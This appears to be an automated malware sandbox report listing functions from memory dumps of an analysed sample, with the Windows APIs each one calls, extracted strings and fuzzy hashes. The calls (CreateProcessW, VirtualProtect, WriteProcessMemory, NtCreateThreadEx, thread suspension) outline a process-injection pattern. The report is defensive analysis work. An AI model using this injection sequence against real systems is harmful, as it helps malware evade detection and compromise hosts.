                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID: BIA5$S$_R$jjjj
                                                                          • API String ID: 963392458-1667598387
                                                                          • Opcode ID: f2a207d2bc7a3463ab79eb200694f30c31d60b846750a6586b60a605faba2795
                                                                          • Instruction ID: 2ba1a149b6c9489e622110a52d0764ff09bd9d228a1ca0ca0f2b8a0f11b3d330
                                                                          • Opcode Fuzzy Hash: f2a207d2bc7a3463ab79eb200694f30c31d60b846750a6586b60a605faba2795
                                                                          • Instruction Fuzzy Hash: BF22CDB1D052688BE724CA18DC94BFABBB5FB84314F1580FAD80DA6281D6789FC5CF51
                                                                          Function 0086BC58 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 292processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000002,00000000,00000000,FFFFA50C,FFFFBE18), ref: 0086CADD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID: _R$jjjj
                                                                          • API String ID: 963392458-548377202
                                                                          • Opcode ID: e017325d12036dbbd3944ddf0c3b731a19a9bf8e4f2fff77fedcf34077eea285
                                                                          • Instruction ID: b0795cab04c60f4fdadd912ad442aaacc00afa9d3a3c83824c057ddb2c48eed3
                                                                          • Opcode Fuzzy Hash: e017325d12036dbbd3944ddf0c3b731a19a9bf8e4f2fff77fedcf34077eea285
                                                                          • Instruction Fuzzy Hash: B7B1F4B1C082689AE7248B24DC55BFA7B75FF40304F1480FAD54DAA281D7B99FC5CB62
                                                                          Function 008456F6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 252memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Q$XP
                                                                          • API String ID: 544645111-2747523662
                                                                          • Opcode ID: 70558449dd412dc78808ade63492eeecc943651df1192703e8e7efd653501b87
                                                                          • Instruction ID: 7467057c6162e8804b48c30bd14e013696420b760a3d49d7e969b162e4bdc023
                                                                          • Opcode Fuzzy Hash: 70558449dd412dc78808ade63492eeecc943651df1192703e8e7efd653501b87
                                                                          • Instruction Fuzzy Hash: 93A1BCB2D056289FEB24CB24DC94BEAB775FF95304F0441EAD90DA7242E2386E81CF51
                                                                          Function 00845531 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 217memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Q$XP
                                                                          • API String ID: 544645111-2747523662
                                                                          • Opcode ID: 7cad0540644da736d243623231e42aece3b0ce2fdbc1ef9ffcd7dc49601bdafc
                                                                          • Instruction ID: b699c24826a4d4831d75c3d0fca7a82fb4e13edd9c0034e2a290b87d83477a56
                                                                          • Opcode Fuzzy Hash: 7cad0540644da736d243623231e42aece3b0ce2fdbc1ef9ffcd7dc49601bdafc
                                                                          • Instruction Fuzzy Hash: 31818BB2D056289FEB24CB24DC94BEAB775FF94314F0441FAD90DA7242E2386E81CE51
                                                                          Function 0084565F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Q$XP
                                                                          • API String ID: 544645111-2747523662
                                                                          • Opcode ID: 7bc996bb8df4d489862fbd5fac89f21935b22adf558600a3d5d41489ae772920
                                                                          • Instruction ID: 05c0c9e0f39500b98786ba67085e0aaa06051ba62e6c87fd965690a4387135da
                                                                          • Opcode Fuzzy Hash: 7bc996bb8df4d489862fbd5fac89f21935b22adf558600a3d5d41489ae772920
                                                                          • Instruction Fuzzy Hash: 44819AB1D045289FEB248B24DC94BFEB7B5FB94314F1441EAD54DA6282E2386FC1CE51
                                                                          Function 0087C7FF Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 593nativethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087D548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID: _R
                                                                          • API String ID: 2422867632-4285093506
                                                                          • Opcode ID: f49aff1e640fc6b1072ccf9e1fca8caad84507267c5e72b2b33860e61ed57aa9
                                                                          • Instruction ID: d53411b0ea51dee6c7d1ac5f846b7fb9984a56cb333d607b5a31238054888940
                                                                          • Opcode Fuzzy Hash: f49aff1e640fc6b1072ccf9e1fca8caad84507267c5e72b2b33860e61ed57aa9
                                                                          • Instruction Fuzzy Hash: E832AFB1D042689BEB24CA14DC94BEABBB5FB84314F1481FAD80DA7284D7789FC58F51
                                                                          Function 0086D37A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 426threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SuspendThread.KERNEL32(?), ref: 0086DF18
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: SuspendThreadWow64
                                                                          • String ID: 9MM;
                                                                          • API String ID: 1286204186-553234120
                                                                          • Opcode ID: 935a91fda874f28430492afdf049620dbc9ddad10085fd2f00c6484e33508723
                                                                          • Instruction ID: 06b3972debb2dee45c8f3756cd67d66ee5e8f0b69de40be7acfe6b8d823966a9
                                                                          • Opcode Fuzzy Hash: 935a91fda874f28430492afdf049620dbc9ddad10085fd2f00c6484e33508723
                                                                          • Instruction Fuzzy Hash: 4E02DFB1E052288BEB24CB14DD94BEAB7B5FB94314F1541FAD809A7682D7346EC1CE41
                                                                          Function 0087D131 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 404nativethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087D548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID: _R
                                                                          • API String ID: 2422867632-4285093506
                                                                          • Opcode ID: 6d519a2b5ef6682f30ae0462319750a90020486a894047eacf15c89af8cc3552
                                                                          • Instruction ID: fa0068836e08d77e83f187631d2acc6ea6fd5028955b60203f281d4827c88bea
                                                                          • Opcode Fuzzy Hash: 6d519a2b5ef6682f30ae0462319750a90020486a894047eacf15c89af8cc3552
                                                                          • Instruction Fuzzy Hash: DFF188B1D042688BEB24CB14CC94BEABBB5FF84304F1481EAD84DA6285D3799EC5CF51
                                                                          Function 0086DB31 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 379threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SuspendThread.KERNEL32(?), ref: 0086DF18
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: SuspendThreadWow64
                                                                          • String ID: XV
                                                                          • API String ID: 1286204186-401391866
                                                                          • Opcode ID: bfcd213b807e97697272511212d60eb3699ab484138a4cd5654ef7a391bbb502
                                                                          • Instruction ID: 7bd975d46a0de3b4cde1e71f03168985cab540eb4d2cd05f08b16cddd750230e
                                                                          • Opcode Fuzzy Hash: bfcd213b807e97697272511212d60eb3699ab484138a4cd5654ef7a391bbb502
                                                                          • Instruction Fuzzy Hash: 35F136B5E052288BEB24CB14DC90AEAB7B5FB95305F1581EAD80DA7381D6786EC1CF41
                                                                          Function 00878B99 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 288injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 008798CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID: _R
                                                                          • API String ID: 3559483778-4285093506
                                                                          • Opcode ID: 2fdb0802036ed56a4d0e4690acf272cc3f133b738b92784ca720a60125838a7f
                                                                          • Instruction ID: d1df62edfdc99af24421cdee8f2df71cb13437cb10f9467886ddf56bc7b2b780
                                                                          • Opcode Fuzzy Hash: 2fdb0802036ed56a4d0e4690acf272cc3f133b738b92784ca720a60125838a7f
                                                                          • Instruction Fuzzy Hash: 97B1F5B1D082689AE7208B24CC847EAB7B5FF81314F1481EAD44DA6645D6789FC5CF62
                                                                          Function 0087D018 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 279nativethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087D548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID: _R
                                                                          • API String ID: 2422867632-4285093506
                                                                          • Opcode ID: 3459c553f2af762e72e0d7c03abe189faefa102aae1a7fbea3801c0beab857a9
                                                                          • Instruction ID: fac64e50b6dd434385656065ec77d9244cb25fe54b4ed9fd78ed91d8b008f65d
                                                                          • Opcode Fuzzy Hash: 3459c553f2af762e72e0d7c03abe189faefa102aae1a7fbea3801c0beab857a9
                                                                          • Instruction Fuzzy Hash: 0AB1E4B1C082689BDB208B24CC94BEABBB5FF40304F1481EAD44DA6285E7798FC5CF51
                                                                          Function 0089A2D1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 273memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0089A62C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: 6
                                                                          • API String ID: 544645111-498629140
                                                                          • Opcode ID: 21e145b9d01d0429d681cef96d68f8ddd4dd59dc6755a6771de829f119c38e8d
                                                                          • Instruction ID: bae948e39814d16321d524a3ff01917d5c3a3f21a29f9cababf8c07221ef7607
                                                                          • Opcode Fuzzy Hash: 21e145b9d01d0429d681cef96d68f8ddd4dd59dc6755a6771de829f119c38e8d
                                                                          • Instruction Fuzzy Hash: C9B17EB1E441299FEB28CB14CC94BEAB775FB85314F1841FAD50EA6640D7789EC0CE82
                                                                          Function 0087CBD0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 245COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: 61165d2f762cb19fdab78447826a224234b42124714635585f106bceac67785d
                                                                          • Instruction ID: 91c818aab94d8dc986773f2af93743516f3e130c2c6bcd75ebe55b6b7290dba7
                                                                          • Opcode Fuzzy Hash: 61165d2f762cb19fdab78447826a224234b42124714635585f106bceac67785d
                                                                          • Instruction Fuzzy Hash: E29128B1D08298AFE7258A24DC95BFA7B78EF41304F1881FED80DA6245D2799FC48F11
                                                                          Function 0086D945 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 239threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SuspendThread.KERNEL32(?), ref: 0086DF18
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: SuspendThreadWow64
                                                                          • String ID: GOI7
                                                                          • API String ID: 1286204186-3309773862
                                                                          • Opcode ID: 05014760f509d448bb701bb4e629044328589c276fd667273f425caefc7aa39b
                                                                          • Instruction ID: 912582230639a1f14164e3dc0457f1922141a49261f53d172d17c6e55748c125
                                                                          • Opcode Fuzzy Hash: 05014760f509d448bb701bb4e629044328589c276fd667273f425caefc7aa39b
                                                                          • Instruction Fuzzy Hash: 2F91ACB1E042288FEB248B14DC907EAB7B5FB98314F1581FAE94DA6640E7385EC1CF51
                                                                          Function 0084536D Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 201COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: XP
                                                                          • API String ID: 544645111-2561422682
                                                                          • Opcode ID: 919e1e6ac23e43c94098daca132517e119caa9a7c39ac7508367a69e539b8994
                                                                          • Instruction ID: b4b8ac2dd024ad6ef792d4e642dcc712c4913ae828c506385ada4454124cec0f
                                                                          • Opcode Fuzzy Hash: 919e1e6ac23e43c94098daca132517e119caa9a7c39ac7508367a69e539b8994
                                                                          • Instruction Fuzzy Hash: CD71D2B1D0865CAFEB20CB24DC94BFE77B5EB85314F1481FAD40D9A281D6386EC18E52
                                                                          Function 0087D3AC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: 6b0cdf830fb9954076793573a4b5185365979ae5d9bd51777d8227aa2393c962
                                                                          • Instruction ID: 84b010ffaabe3b7a149113db71f228643f7ed8ed82397708bab65f2a457a9cd3
                                                                          • Opcode Fuzzy Hash: 6b0cdf830fb9954076793573a4b5185365979ae5d9bd51777d8227aa2393c962
                                                                          • Instruction Fuzzy Hash: AF61E5B1D082A88BEB25CA14DC94BEA7BB5FF41304F1480FAD40DA6245D2799FC5CF52
                                                                          Function 0084559A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: XP
                                                                          • API String ID: 544645111-2561422682
                                                                          • Opcode ID: 6edaee10a2d21486d7aa30f8abcb64db26210d5603151562c9474f5cbc4b2043
                                                                          • Instruction ID: fc2f8b6652fca807320317afac019d968133239e59117a7a9bb66750756f693b
                                                                          • Opcode Fuzzy Hash: 6edaee10a2d21486d7aa30f8abcb64db26210d5603151562c9474f5cbc4b2043
                                                                          • Instruction Fuzzy Hash: 4D6189B2D05528AFEB248B24DC54BEAB7B5FF95314F0441FAD50DA7282E2386EC1CE51
                                                                          Function 00845410 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 166memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: XP
                                                                          • API String ID: 544645111-2561422682
                                                                          • Opcode ID: 079fecb0d6cba55605babc8f391f3485fa27fdac245c01cb71d80f01df6396dd
                                                                          • Instruction ID: f2e9958c2bfa658b5934998c066037778631b4998de57428eb7fc22b1a92b572
                                                                          • Opcode Fuzzy Hash: 079fecb0d6cba55605babc8f391f3485fa27fdac245c01cb71d80f01df6396dd
                                                                          • Instruction Fuzzy Hash: E851B2B2D0865C9FEB20CB24DC54BEE77B5EB99314F1481FAD40D9B281D6386EC18E51
                                                                          Function 0085D168 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 149nativethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087D548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID: _R
                                                                          • API String ID: 2422867632-4285093506
                                                                          • Opcode ID: b7036088fc8e7b474e4372e2c50a0aecfe1e7d76a0358baf24cc265396a6b2e3
                                                                          • Instruction ID: c21322d9141f1eef9d89f79271626f1a094893d6f287747cd8d573e92283efd1
                                                                          • Opcode Fuzzy Hash: b7036088fc8e7b474e4372e2c50a0aecfe1e7d76a0358baf24cc265396a6b2e3
                                                                          • Instruction Fuzzy Hash: E25107B1C083989FE7208A24DC84BAABB78FF50304F1481FAD40DA6285D2B9DFC58F51
                                                                          Function 004B3B60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 143nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004B4B99
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID: C6=9
                                                                          • API String ID: 2949231068-3186520411
                                                                          • Opcode ID: 655e84608381e51a0caa5ec39fc6e1d5f9c44a2a126ebdf060c0c5f92b66be3a
                                                                          • Instruction ID: b4634b44c4162d9e2c1e11cc994e62421d309efd48b7c49529d33c35b68efcee
                                                                          • Opcode Fuzzy Hash: 655e84608381e51a0caa5ec39fc6e1d5f9c44a2a126ebdf060c0c5f92b66be3a
                                                                          • Instruction Fuzzy Hash: 9151DFB1D182649BE7249A60DC40BEB7675EF94300F0040FED80E97382E7799EC28B66
                                                                          Function 0085C99A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120nativethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087D548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID: _R
                                                                          • API String ID: 2422867632-4285093506
                                                                          • Opcode ID: a17b0cef26c7dfbe8c48afc40c45fef1140929c4e636bf6ecb14d8c459b24b81
                                                                          • Instruction ID: 5480ae197d15350b82886e6ea1d5655428e1ad7b89e35fe9bdbe94f97c993e64
                                                                          • Opcode Fuzzy Hash: a17b0cef26c7dfbe8c48afc40c45fef1140929c4e636bf6ecb14d8c459b24b81
                                                                          • Instruction Fuzzy Hash: 954126B1D0C2D89FE7218624CC85BEABB78EF51304F1480FAD00D66282C6B9DFC58B52
                                                                          Function 0086E5FA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 552memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNELBASE(00000000,000002CC,00001000,00000004), ref: 0086F316
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: _R
                                                                          • API String ID: 4275171209-4285093506
                                                                          • Opcode ID: cf08968b933e7666edf727862540d82722d60700e4eb354c951b404e6b6bcbc1
                                                                          • Instruction ID: bf0cd995e4e45cbb002618cdcc38b5f52e1d2518cc27e259f4758570a96470e0
                                                                          • Opcode Fuzzy Hash: cf08968b933e7666edf727862540d82722d60700e4eb354c951b404e6b6bcbc1
                                                                          • Instruction Fuzzy Hash: 6422EDB5C042688BEB24CB24DC84BEAB7B5FF94314F1581FAD80DA6281D6789EC5CF51
                                                                          Function 0086E9C4 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: b8ab5a504119f3c636051153b3abdc1394626b4fe3640cd922b00cfe21d352fb
                                                                          • Instruction ID: 1b22006e3342253358a49cdefdce94861f741773f8ab99752c6dcb900aa4113a
                                                                          • Opcode Fuzzy Hash: b8ab5a504119f3c636051153b3abdc1394626b4fe3640cd922b00cfe21d352fb
                                                                          • Instruction Fuzzy Hash: 5A8149B1C082A88AEB248624DC95BFF7B74FF51314F1841FAD40EA6281D6799FC18F52
                                                                          Function 00834B5B Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: 2EDF
                                                                          • API String ID: 1263568516-111005369
                                                                          • Opcode ID: 1275051a707cd4002b55b038cb87d868e9573443ac0623367963d5eb72378b16
                                                                          • Instruction ID: a65eedc2822d2dad9aa0701cecb7fd2e455ddd81da3845e8c8af98ebc385f65c
                                                                          • Opcode Fuzzy Hash: 1275051a707cd4002b55b038cb87d868e9573443ac0623367963d5eb72378b16
                                                                          • Instruction Fuzzy Hash: 2561C5B2E006289BE7248B64DC54BEBB775FF84311F1051F9D90DA7280D678AEC18F51
                                                                          Function 00834986 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: 2EDF
                                                                          • API String ID: 1263568516-111005369
                                                                          • Opcode ID: 2e15b9c31f82210083d9cb99c3ec42944a89de856c63a32077643b1cb1d0b2a2
                                                                          • Instruction ID: 5dfa6837ad5a7143f38747989c2249579162ec40666c457d3f41634eda33397b
                                                                          • Opcode Fuzzy Hash: 2e15b9c31f82210083d9cb99c3ec42944a89de856c63a32077643b1cb1d0b2a2
                                                                          • Instruction Fuzzy Hash: 7051D1A2E016189AEB248B65DC54BEBB775FFC4311F1081F9E50DA7280E6789AC18F51
                                                                          Function 0087B5D9 Relevance: 2.9, Strings: 2, Instructions: 409COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: NHAE$_R
                                                                          • API String ID: 0-3206149426
                                                                          • Opcode ID: 5fa4d89a89611d2b71b1a4819d1e532aa0473781fe3b7d15c586322590a0c127
                                                                          • Instruction ID: 6302b9cb41290a411ccdb512b10137fe499a106ea70a039b8a3df0038ebec71f
                                                                          • Opcode Fuzzy Hash: 5fa4d89a89611d2b71b1a4819d1e532aa0473781fe3b7d15c586322590a0c127
                                                                          • Instruction Fuzzy Hash: C2F1BFB1D041688FE724CB14CC94BAABBB6FF91318F1481EAD94DA6245D7389FC18F42
                                                                          Function 0087BD0E Relevance: 2.8, Strings: 2, Instructions: 269COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: NHAE$_R
                                                                          • API String ID: 0-3206149426
